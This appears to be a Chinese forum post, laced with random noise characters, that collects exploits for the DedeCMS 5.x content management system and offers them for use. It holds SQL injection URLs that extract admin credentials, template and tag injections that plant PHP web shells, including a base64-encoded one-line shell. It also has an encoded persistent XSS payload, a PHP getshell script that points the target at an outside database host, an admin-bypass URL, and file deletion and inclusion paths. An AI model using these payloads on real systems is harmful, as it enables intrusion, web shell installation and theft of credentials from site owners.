|
|
" b9 _: G$ m: C5 lDedecms 5.6 rss注入漏洞; X2 }, A' m1 M# B' v2 v3 ^! E+ P
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
! A) d7 v+ d( U& W, Z& J( f% F
9 C4 u2 d$ A2 R# V- {6 V' i) ^4 j8 ]0 j$ J+ x1 |/ u/ V9 n
5 B+ G# v4 b" U- v9 d) S# V/ \7 s+ G
: M% E3 i# u# }* j) t- H, G* E- g, n/ i! P
) T7 o8 l( j4 N
h. z. m& s8 w" E, S2 x* C3 S7 `* T, N" A; S
DedeCms v5.6 嵌入恶意代码执行漏洞
! U% d8 a0 @6 Q7 l! O8 f4 r, R注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
) z, R o0 Q# S6 t' f发表后查看或修改即可执行
2 L- U& v& o& y: Z7 J* U$ a' ^3 ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} D1 q; m8 f" L0 T
生成x.php 密码xiao,直接生成一句话。
6 s$ ? z/ C9 V# i: Q/ c
) I, Q7 z2 B2 u& ?( o2 H9 N6 A* g' I# Q8 s9 l! Q7 T) J
2 N0 ]: y; a K4 z3 v
2 L! u) _' _4 f8 }$ j
4 E" p, f3 n% k0 j8 \9 i" i( f" C7 m. H0 j+ j [# f" e
1 W5 Q7 d; _ }0 |2 F! K" L# A8 k
- r/ o5 g/ D3 u8 ]* YDede 5.6 GBK SQL注入漏洞
! H4 h1 v8 k$ S3 vhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
3 z& [6 [) d* c3 f j) I* V3 Ghttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe: E$ q. b; o8 h" n |5 e* [' }, m
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A77 A: F3 D0 r9 ^
4 V h/ S7 s; G+ T) }# ^. U* x$ _. N# C& H/ O
" {4 V- ^4 A, P T5 I0 z& W5 N' o& k3 x, d
& n0 w F6 i# t$ T. q: N7 i* q; \
/ M+ q$ { O1 d; y& N% Q1 O+ v" _7 \! ?( `3 p8 a. M Z6 L
5 ?' j8 v7 q% G, |! ~+ o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" N. b2 ]( h% j6 i1 C' `http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` , k" D' n2 T. `- {2 a. c
C* ?) S! j$ M; t
( B. e; H2 _/ U8 X9 h; A$ d8 p3 M, _6 j8 l7 z$ t4 k
* b1 n- T. R# X" @' i4 J. @+ D
7 }% Q7 |) V: @
5 P- F' f& D. q! R# l
DEDECMS 全版本 gotopage变量XSS漏洞4 H/ S, A2 {6 P( u6 ~' D* o: k# D
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
6 I' ]$ k W! {4 m1 ohttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="' L8 |0 T+ O% u/ w0 h. O
" b9 u: Y# l" Y2 S1 ]
1 Y M6 E+ _% v% I! X
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
6 K' D- h) C$ z# y6 lhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
9 W0 l$ v4 c7 U! M
* L( j0 d2 Y8 `6 B6 I8 C9 p8 B- S+ x) [$ z& n
http://v57.demo.dedecms.com/dede/login.php9 }+ I* W6 i1 u1 d' K( H3 V# t
$ U' P1 k# Q, o& Q: C
; L8 o- d9 @; F1 x+ \color=Red]DeDeCMS(织梦)变量覆盖getshell/ F3 t; V. ^. X" u: R3 h% u& i
#!usr/bin/php -w
! s6 ?& b5 Q* D2 _' C& D2 a<?php) J" ^' P6 B6 T9 e
error_reporting(E_ERROR);
( y' v. I8 x, U) @0 @( }set_time_limit(0);
: g9 {% h" W; u# \; G" x9 rprint_r('
% R) w: N) I% I+ m$ GDEDEcms Variable Coverage
6 n3 U8 o/ g$ I4 P- AExploit Author: www.heixiaozi.comwww.webvul.com% M( E: T7 P* [3 e' k1 M
);" G7 q6 d# z0 g% ~; F! V$ [/ o6 y
echo "\r\n";
0 v9 e8 E; n$ jif($argv[2]==null){$ a- ~7 o6 \, u' b
print_r('7 s' x& t$ g( a8 X5 k% s
+---------------------------------------------------------------------------+
6 F, z6 Q$ L. D2 {0 [9 xUsage: php '.$argv[0].' url aid path9 M5 @1 @ B: ~& A* r2 I
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/9 u( X% ]7 C+ n8 H! o- ]
Example:4 [; @+ `1 d3 V' r* m
php '.$argv[0].' www.site.com 1 old
5 h, Q3 j, u; L$ {/ T, L7 d+---------------------------------------------------------------------------+; t6 \% K# n! l4 R1 o+ G, M
');0 j0 y1 l: L; y; x
exit;
4 m" U+ T" b4 ?5 H0 t3 ?; U. S7 f}) w& x- v1 x6 A4 g! x
$url=$argv[1];1 C& E+ \1 s: o: g, c- |
$aid=$argv[2];5 k/ x- x( b$ N( X
$path=$argv[3];: ^7 J+ X1 x% n7 U- c* B, B) s1 M
$exp=Getshell($url,$aid,$path);
3 H. Z0 O- {' [0 p% j$ j* [if (strpos($exp,"OK")>12){
2 D; ^6 O( }8 Q- E# d+ Zecho "3 Y/ P/ T* {4 n
Exploit Success \n";; Z6 L9 C$ M3 F* r* m1 z
if($aid==1)echo "+ ~5 h6 @* o5 Y6 l/ p h u, k
Shell:".$url."/$path/data/cache/fuck.php\n" ;
! _) E3 z2 g) o& `! {& ]$ A) |6 D. H+ W3 R* e
3 j! c5 Z) R% O) l6 i( O
if($aid==2)echo "
0 N# N. \& T+ o5 AShell:".$url."/$path/fuck.php\n" ;
; ?& ]6 O) p5 k2 C
0 j* s3 s! e* m2 P7 D' @( B6 a( B" v. L! G4 G3 c
if($aid==3)echo "
' q. |6 a& O7 Y" o8 m, ]2 Z# j+ i4 qShell:".$url."/$path/plus/fuck.php\n";7 U4 d" r, v8 o/ n" r" _
2 N' w0 m8 }! s5 R: N0 m" i- z
7 W4 F7 c2 m* ~8 m, F
}else{
' i6 k+ U% {4 @# xecho "
; [' p6 ?5 a* K4 W4 w* _, ?Exploit Failed \n";
# P" f% f- p* X: e, K" y! f}/ P4 y1 s* g: e- f
function Getshell($url,$aid,$path){
$ U/ C; o4 v! m3 P8 R$id=$aid;3 Z- G+ p* h5 b
$host=$url;6 ~5 A" i& a q* a m8 B& t
$port="80";
6 ?& h1 |# R0 [- m$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
4 U* t( q/ e3 |) W- _$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";1 W8 t2 `$ g+ _ e( b; m, x3 {0 p1 g
$data .= "Host: ".$host."\r\n";6 D1 ~$ b. \% [- T6 y
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
3 |. D* q& ], { f; m1 S$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";/ o' c) {6 J( w: b8 ^7 P& Q0 t$ i
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
2 M6 I% B+ f. ^8 z! Q//$data .= "Accept-Encoding: gzip,deflate\r\n";
3 {$ y$ @3 E* M: [* ?5 I7 Q( B$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";# R) i( D- f3 ^+ g% V
$data .= "Connection: keep-alive\r\n";; ?1 Q, k, c3 w
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";1 \- I, s/ V7 o
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";. |# {) Y$ {+ V0 U% Z0 M% h7 f
$data .= $content."\r\n";
2 n- C& {2 h8 o$ G3 Q9 Y' c$ock=fsockopen($host,$port);( N3 k% t K7 b0 O
if (!$ock) {2 o* R% ]6 O! J' W. _# k! |/ P& j; K
echo "/ D! O9 w y4 F7 ~ E
No response from ".$host."\n";
6 m4 }* }3 E! R3 D6 J}
7 @& m, M/ e1 f- j5 d' M: ]# Qfwrite($ock,$data);$ X' f9 | k5 @
while (!feof($ock)) {1 m1 k$ _0 D! g# z' J
$exp=fgets($ock, 1024);, {$ C% `; p$ {5 \) V* r* D1 O, W
return $exp;
. p5 d- J$ f$ \+ e3 M}
: R D; h. f2 N3 V/ ~/ R. X8 }}2 y5 b6 O# r8 y) Q, l5 y1 g6 ]4 c
& a- g8 ~. M% A4 i
7 i% ^, K/ C6 w- e2 ]?>8 ~! g+ U8 j# w( F" }
( t4 p, D7 U: b! D) l
4 B- E" [0 ]4 z: t( l/ Y& a5 Y) Y7 |" `3 n6 s+ H
* A& s$ U' j% V9 }6 K6 X f
( L2 w; A, c a3 y k
{; E- F! _$ F7 [
" z: z' r' c% g. ?! a( v" |1 q6 g/ N
' i2 d* ^7 w5 p0 l1 i$ J5 y
4 J5 y& _9 D9 ~" z3 T0 R
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
; ?5 u# X H7 S4 z2 @% Dhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ b; \& U6 P! q8 _+ [, z6 z) j& s( x( \, V
. M; ~7 V' g3 E( i$ U把上面validate=dcug改为当前的验证码,即可直接进入网站后台
, O4 O# B$ w {/ P& G' c& @) V/ A
2 ?2 r. N; |8 r+ s7 P) u+ T
此漏洞的前提是必须得到后台路径才能实现
, d1 j* n5 g8 Z2 w" D3 P, x5 V$ m. C+ q& j9 x4 v# m
: k; `6 R; L g2 S! E
( a3 A5 Q5 [3 A Z
/ k& F4 `! b2 x" K. T
7 z( Q, f3 R1 ` X2 ^3 I/ p8 `+ ^! d4 I
- g; A2 ?) ]% n% L
4 ~8 b2 W: l }: O6 o G( s" M
4 Y4 e( c" d2 t- ~' o8 n2 Y# V1 V5 Z- F" m3 k7 K( _
Dedecms织梦 标签远程文件写入漏洞
! |) F) ?; i7 f5 {# b前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');: x8 A7 O9 z3 q
1 a7 U4 o9 M8 ~" p' A/ `' \
& J' z; K5 B! G* }5 E* _再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
# e1 D5 X$ b9 x0 w: j# D<form action="" method="post" name="QuickSearch" id="QuickSearch">
, x4 t4 f Y3 h8 l6 j<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />( b- C/ W8 s4 z- {3 |" E; {+ J
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& m1 m& M; s" t6 y a' G/ w! C5 i<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
" n0 ^* ?3 R5 O# R, ~<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; C* G I E7 Y2 K/ F
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />9 X3 n7 B- z8 _7 m V6 @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( N4 W) b* v8 Y9 e p
<input type="text" value="true" name="nocache" style="width:400">, v7 ~7 c" i' l" w" C1 u
<input type="submit" value="提交" name="QuickSearchBtn"><br />( V& r0 B9 y, W2 f$ z
</form>
9 W" B g- ]2 r; i. q. b<script>
4 u s! \% x0 r" [5 j3 }* ]3 v. cfunction addaction()
: X3 f+ k! k8 I7 L( D* H{' T. b% |9 }6 T5 x4 _1 @- B
document.QuickSearch.action=document.QuickSearch.doaction.value;+ ~9 }/ G0 F& s4 [# v+ j5 b0 }
}9 h+ h5 L( G7 L
</script>$ n; N* `& Q. j: s
# J- {3 C) B8 P" w" q( v9 y. Q
$ [! I- v; r+ z$ Y: i" {/ p! M. j" Q$ E
6 I2 h; s1 b' b, z1 o0 Z
0 c1 x" D. W/ B
! d4 Y: R2 s7 f
# c" k, T9 ]+ C& R/ `7 x: I' V8 O: C5 Y# y9 X- \! D1 e
+ Q& Y) B* P; J! ~6 o
* }' A1 z' `0 e3 F: P2 ` D7 ]4 [DedeCms v5.6 嵌入恶意代码执行漏洞
! x# [3 u6 Q Z3 o8 t, h" o. |1 C* Q注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行: `* b; t3 [9 F7 ?( V8 ]
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}4 O5 O F' j! N! M* }& ^0 L
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得- C; m, U$ z$ o7 o, |! Z5 V( M% w
Dedecms <= V5.6 Final模板执行漏洞
, r0 k; u$ v% t, F2 o; ^注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:% o5 s2 J6 L j$ ]2 h1 q6 ?
uploads/userup/2/12OMX04-15A.jpg: x3 m% w H# m& Z' \" Q
6 K# W3 X& H6 U: \9 w# e# o% t
7 a& U) J$ q& Z; T6 o
模板内容是(如果限制图片格式,加gif89a):. y" T2 H' T# p3 m2 m' b) h
{dede:name runphp='yes'}+ G" N+ K, Z! f. v! F; {
$fp = @fopen("1.php", 'a');
& N! O5 |( X1 x4 C0 N2 q8 R _0 z@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
: Y$ F1 Q) y. T _9 `@fclose($fp);+ R+ {5 H1 f& V& p6 O5 n; t) ]- Z
{/dede:name}# s9 h2 N; J5 ^6 @5 d" `
2 修改刚刚发表的文章,查看源文件,构造一个表单:$ U' W4 B5 V& v) ]
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">* ]0 C9 u1 G8 q3 E; a( k4 Q
<input type="hidden" name="dopost" value="save" />
7 z7 r- p# w, r& v: Z<input type="hidden" name="aid" value="2" />
; P- q; y, }/ Z: G# a2 @" T<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />! c. [# D5 e) X4 d5 G6 x' Z1 H
<input type="hidden" name="channelid" value="1" />; D, ?) V4 `3 G _4 V' \ s
<input type="hidden" name="oldlitpic" value="" />; B. y- a! {5 q# ~
<input type="hidden" name="sortrank" value="1275972263" />
& S b- r$ S2 F% d: u
- P" |/ l0 j: k8 S# R; r, S3 i6 `8 d" q
<div id="mainCp">3 V# h0 h. K/ E1 z- \
<h3 class="meTitle"><strong>修改文章</strong></h3>
9 L; J$ O7 [+ _) H/ X, j: U' |+ c, M/ C
$ l7 E$ B# R# A0 R1 F# @
<div class="postForm">
; ~8 {. C/ }" h7 S<label>标题:</label>: B* n3 L. `1 F) f! ]: m. b- h
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
2 E( u- [# `( K/ U. j! `/ W8 d( N' h
3 r- o0 Y4 @! c8 d* q- A e<label>标签TAG:</label>
! e/ u- [3 P8 c0 H<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ R. b X- y L% I# \$ N, p
: o/ Z# c1 ?4 V! r( B
6 r, o! [3 C/ ]5 @- \
<label>作者:</label>( \- k2 [, I; {5 h1 B+ K$ |; g
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>: X. Q3 t( Q$ T5 j s3 W% n" E
; }- a# K S: C7 B' v7 U
" \6 ^9 n+ K3 G. Z6 W- k/ p5 z0 w2 H<label>隶属栏目:</label>. Q! U% B* E2 q6 E% |3 J
<select name='typeid' size='1'>7 u9 h% Z% ]8 I& v, |) @
<option value='1' class='option3' selected=''>测试栏目</option>
) }8 Q$ ^7 K/ C8 r4 C# I5 s, ~8 h</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
) d: z0 _+ O9 V2 D; l0 M3 Z9 ~: _
$ ^/ u( q; |: J9 @2 d3 ?# P
<label>我的分类:</label> I8 S4 u" l# u# z' {! l, T( b
<select name='mtypesid' size='1'>
+ K; N" `7 F: S: J6 d: S X<option value='0' selected>请选择分类...</option>' \ d8 J* X1 B4 N3 g
<option value='1' class='option3' selected>hahahha</option>
% o7 j2 g2 j; R2 C$ B1 m' g</select>
) [" t- }6 f+ j, u7 F* }+ b, T7 ]* L0 q7 m9 P1 ?6 d/ t- d
6 E6 ~4 x0 x$ _; x$ G- ]<label>信息摘要:</label>% f; o' w9 ]( ^& H" W5 P
<textarea name="description" id="description">1111111</textarea>
7 ^9 C# `8 Q% E3 u(内容的简要说明)' l ?; r8 {" D- A' v3 z
6 `# s! _ z: N6 f
2 W# [, `' J9 @+ V+ L
<label>缩略图:</label>, P, X8 [* x. S# D" H
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>& \& D# h, b# o! f" f) R0 r8 P
* ~' f3 j: ~+ _& U$ W
$ a) U% W/ u+ |1 ]0 _<input type='text' name='templet'
& S' V' G% W$ I0 Hvalue="../ uploads/userup/2/12OMX04-15A.jpg">; t9 V" Q6 Y# R( y
<input type='text' name='dede_addonfields'! f$ s! }+ y4 m ^3 Y
value="templet,htmltext;">(这里构造), S& i" } X9 q/ G! X& h
</div>: T( |' @/ I1 A4 k2 w% S
F6 r9 S- t, B9 O4 h
7 S" h* s7 w3 q# H/ b: h<!-- 表单操作区域 -->
2 R5 j' Y3 j1 B. i7 Y3 ?<h3 class="meTitle">详细内容</h3>6 w+ F3 @7 d2 ^
% |2 b; e( j, _/ ^1 j7 O, S+ J
2 Y& `0 C$ D; h% N; o<div class="contentShow postForm">
: i: Q" K. B: E& u3 {' m1 X0 T<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 I7 P% E& _/ p6 i
6 k: L D2 f' |/ C# M1 b+ Q
# F; z* [9 T% z% g K! U
<label>验证码:</label>
$ J6 A" v9 N+ r2 S' R3 m<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />, H: O& ^; f8 _, A
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
2 R& g4 a* V% H- q7 ~+ o
7 ^6 E8 Z8 E5 `/ h% c: Q8 |8 H) x
$ X! C6 B3 y6 F% q<button class="button2" type="submit">提交</button>+ G! j z1 x- b3 P, j& g- q
<button class="button2 ml10" type="reset">重置</button>
! M3 F. l' c; M: |& {</div>
1 `6 ?* a4 f2 W1 A. q& d; s
2 z2 V5 F& u, d- W
1 _. s0 X2 }6 b1 u! d% @+ h$ ?</div>
) `" \* `7 ^6 P3 P0 T! z1 r$ ^. I8 Z. G- N; Q. C
5 q7 k3 [9 C, m4 g</form>* v f2 L: h0 I, T8 u* c
* D- v" }3 @* Z7 p# V1 U Q
3 X2 z4 D% f7 _5 V提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
* d, f" a5 B0 N, l. w假设刚刚修改的文章的aid为2,则我们只需要访问:/ `" f1 j9 v& a# r
http://127.0.0.1/dede/plus/view.php?aid=28 e5 f9 T/ d. {# f/ i1 q
即可以在plus目录下生成webshell:1.php
5 V x/ r7 B7 c- E% I7 x B# S6 j" {4 d! S' t! h3 C4 A
; Y3 M# k# k) Z7 S* F% H
, x" w) F. [4 y; |1 r& ?7 W
% B& k# I3 {) ~- d
% c# w1 s* a# R" Y; }, J( A6 g/ \0 E0 Y5 t) A4 S3 p
$ l s9 Y4 f2 d% B4 w6 f: k
& Z3 K) E' J; p* j- U
& r9 m; E( V D. I% V# a) G/ Z
2 S4 j6 r7 [ K" ?) y5 I
$ r3 j7 ]* U. d$ ~' A
5 u m5 g' i* ~+ h, y
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
5 l6 L3 J$ a& |Gif89a{dede:field name='toby57' runphp='yes'}
- g7 D3 g! E) j' i }% H& X0 Ephpinfo();
; L/ P: U5 S2 Z7 s4 T; m, w- k9 J{/dede:field}/ J8 Z. t! T) K# O
保存为1.gif
" R- @. O& P; j<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ' E6 F! C' p( C! x' \4 ]
<input type="hidden" name="aid" value="7" />
% b& S3 `* \/ v$ a" _! d<input type="hidden" name="mediatype" value="1" />
0 `$ v3 t8 `( a0 T, h8 L- s<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> / _6 ]0 }$ y) r3 u. b$ N5 W
<input type="hidden" name="dopost" value="save" />
$ f) N, i# u% s+ ?<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
, l E2 J9 w: [<input name="addonfile" type="file" id="addonfile"/>
4 P- @" `; ]4 W! C" h9 k7 d& F<button class="button2" type="submit" >更改</button> 9 ^9 u# U) K% J& \% x
</form> ) x3 b* Z, i) E8 P' n& J
V* f' f( G# q# Z3 i
$ ]4 E a( H; k2 K8 v; ]: q3 ]
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
% m. ~) u& K& ?4 T发表文章,然后构造修改表单如下:
! Q# @ C% g! Y
. d3 I5 ]0 t# f
, B9 c5 p8 {* V8 P% g<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
( F+ i5 R7 l* h3 k4 Y% d<input type="hidden" name="dopost" value="save" /> % m3 W/ Y( _8 d' N1 X* s, j
<input type="hidden" name="aid" value="2" />
8 q0 I: M5 V1 F: q<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> $ n: E* c. a5 q, A' v G
<input type="hidden" name="channelid" value="1" />
2 c7 p3 O+ |: |) K% V5 S' B, x0 N: o<input type="hidden" name="oldlitpic" value="" /> & {1 H" A. E- V% M# B
<input type="hidden" name="sortrank" value="1282049150" /> % l$ B! `! g ~, p% n
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 1 a) \" C, @' }, G
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
; ]- q* |4 V/ ?<select name='typeid' size='1'> ; _" Q3 l. @6 K% `
<option value='1' class='option3' selected=''>Test</option>
- x% P3 s& E( X" |: [( ~# M<select name='mtypesid' size='1'>
: l0 F& s" s) l<option value='0' selected>请选择分类...</option>
v) D, c# ]0 [5 c& t N<option value='1' class='option3' selected>aa</option></select>
# Q& @7 l: F: Q. I# Z6 ~- R<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
; N3 t3 _" m; g4 k" E P<input type='hidden' name='dede_addonfields' value="templet">
; d9 z9 t; F5 s3 I8 C- \5 w<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
+ V* [7 E; P$ {$ b+ F<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
- b( |4 p. _ F, Y<button class="button2" type="submit">提交</button> " E; b3 P9 n; q7 o( m) v
</form>
& w& K$ F6 J; Z9 ] Y, x ^3 r) v% t
1 A+ a$ ~/ a; d' Z* n7 Q! N$ t8 S1 D p1 }1 [4 G! R* }
! H7 H& K0 X- N/ ]
8 ?3 t: U# ], ~& U" M4 K5 T+ k% O A i6 [/ ~( G: I
( A& ~: X, V" ]8 s7 X: C$ X5 ^5 \% J0 L0 C% v6 ]' u
5 c) _, }. }( B4 \* T% s
/ B! \! u( D, ]/ t% N. K. S8 o' w, n
9 T% E- X, B( O+ Z织梦(Dedecms)V5.6 远程文件删除漏洞! }3 W- U* H: g3 u
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif0 \& E: i6 X0 T0 ]" w
& F& l& w8 T$ y) S1 T$ ^9 A
% o% _* Z) @" W4 q% h6 m+ ^
% A+ M+ Z% V" x" O9 y- B. \' z( y
0 E a7 S% U6 A) `: X
0 [2 R# @, z; S7 `
: z! b2 w! a+ f# O
! A; W4 w5 R: p: l
, g2 Y1 T. x( @$ L2 r6 g
; r" q5 l4 D4 W( W/ H& E! C织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
4 k2 Q: F7 u. T$ y0 t( ehttp://www.test.com/plus/carbuya ... urn&code=../../
% x4 a' N6 `6 k0 q, v3 v( ^$ p" S+ L
+ S) H9 c5 o' K$ ?$ i( s
. q* h& b U; x* @. K: O5 e
" ^8 B4 K! T" N8 a7 N, f& K" D
" D' C' u" s( G! Q$ H5 O& R. N
W5 `' R2 ]' I# J
- o- T# c4 _7 t* I. ^/ f; d+ O
2 Z f- J/ {$ Q
f( Y6 w/ k. b6 K. M
8 |6 D7 ]9 X! aDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 5 @: i8 t V7 ]
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`9 j/ B% g1 `1 N% ?. r& D( D8 n
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
* A' |) x9 P, n
9 J: x6 C* r! @5 d* t3 u
6 p% q/ c5 p y; M- H
" l( V7 d+ B; y0 k& l/ g6 v: J
1 [- m [ T1 F+ a1 D) P8 D. }$ K' r3 o1 Y
0 z0 \) g$ ]- y6 l1 K3 m& R0 z' u& ^$ j7 _" @0 D* m2 C6 L, S
& }% y7 y0 a8 [5 b" X) P" r+ F; s1 g# @
( |9 c3 h) @- c( E: K+ I: s织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
* B9 J9 ?* \. t: S4 n3 E! N3 {( B0 Ihttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
. p) W$ ^, \! H9 D J) m. {
* G% ^! G. W. L: g5 {$ x) j1 O! C; _* J0 m
" n" N5 f6 X9 K7 ]1 [- s; I" }: o8 G6 U @3 G
) i) S1 u# p& n3 Q7 _5 Q
* d( ^, E, H2 p( P) P1 i% _0 V7 F) {2 h
z% ^$ \7 y0 L, x5 P
6 a' d% x5 C/ n( z
1 Z3 @6 a" K0 U* k' T织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
! }4 M- X& p; m; o9 u<html>. G) b) n1 F; F6 ]$ c6 e7 L% p
<head>: Q% o+ O5 {0 m7 W. X# i! [1 x
